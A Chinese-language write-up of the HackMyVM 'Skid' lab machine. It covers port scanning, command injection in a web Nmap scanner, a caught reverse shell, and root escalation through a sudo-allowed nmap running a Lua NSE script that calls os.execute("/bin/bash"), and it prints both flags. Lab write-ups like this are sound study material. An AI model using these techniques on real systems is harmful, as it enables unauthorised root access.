HackMyVM-Skid

扑面尘埃二十年,纱笼石刻顿光鲜。廋辞不用题黄绢,自有惊人秀句传。

信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
./rustscan -a 192.168.56.198
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.56.198:22
Open 192.168.56.198:5000
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-01 04:17 EST
Initiating ARP Ping Scan at 04:17
Scanning 192.168.56.198 [1 port]
Completed ARP Ping Scan at 04:17, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:17
Completed Parallel DNS resolution of 1 host. at 04:17, 13.00s elapsed
DNS resolution of 1 IPs took 13.00s. Mode: Async [#: 1, OK: 0, NX: 0, DR: 1, SF: 0, TR: 3, CN: 0]
Initiating SYN Stealth Scan at 04:17
Scanning 192.168.56.198 [2 ports]
Discovered open port 22/tcp on 192.168.56.198
Discovered open port 5000/tcp on 192.168.56.198
Completed SYN Stealth Scan at 04:17, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.56.198
Host is up, received arp-response (0.00064s latency).
Scanned at 2025-12-01 04:17:43 EST for 0s

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack ttl 64
5000/tcp open  upnp    syn-ack ttl 64
MAC Address: 08:00:27:5E:86:C4 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 13.19 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

信息收集能力还不到家

5000端口是个ping扫描界面,确认有命令注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
Nmap Scanner
Target:

Starting Nmap 7.80 ( https://nmap.org ) at 2025-12-01 10:04 UTC
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000018s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp

Nmap done: 1 IP address (1 host up) scanned in 0.03 seconds
uid=1000(jeremy) gid=1000(jeremy) groups=1000(jeremy)


# Nmap 7.80 scan initiated Mon Dec  1 10:04:16 2025 as: nmap -T4 -oN /tmp/scan.txt 127.0.0.1
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000018s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp

# Nmap done at Mon Dec  1 10:04:16 2025 -- 1 IP address (1 host up) scanned in 0.03 seconds

弹shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from skid-192.168.56.198-Linux-x86_64 😍 Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12 
[+] Logging to /root/.penelope/skid~192.168.56.198_Linux_x86_64/2025_12_01-04_18_31-873.log 📜
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
jeremy@skid:~$ cd /home/
jeremy@skid:/home$ ls
jeremy
jeremy@skid:/home$ cd jeremy/
jeremy@skid:~$ ls
app  changes.txt  hacking-tools  user.txt  wordlists
jeremy@skid:~$ cat user.txt 
hmv{7609a0e2e5bf272609dd3e12727eed76}
jeremy@skid:~$ sudo -l
Matching Defaults entries for jeremy on skid:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jeremy may run the following commands on skid:
    (root) NOPASSWD: /usr/bin/nmap

Root

这里很烦,原本打算利用nmap的扫描功能读flag的,但是/root/root.txt是个假的,真的被他藏到不知道哪个犄角旮旯里了,自己拿到root了也翻了一阵最后才找到flag

1
2
root@skid:/home/jeremy# cat shell 
os.execute("/bin/bash")
1
2
3
4
5
6
jeremy@skid:~$ sudo  nmap  --script=shell
Starting Nmap 7.80 ( https://nmap.org ) at 2025-12-01 09:47 UTC
NSE: Warning: Loading 'shell' -- the recommended file extension is '.nse'.
root@skid:/home/jeremy# id
uid=0(root) gid=0(root) groups=0(root)

1
2
3
4
root@skid:~# find / -name "root.txt" 2>/dev/null
/var/lib/.cache2/root.txt
/root/root.txt

#HVM
HackMyVM-Skid
http://example.com/2025/12/01/HackMyVM-Skid/
Author
Skyarrow
Posted on
December 1, 2025
Licensed under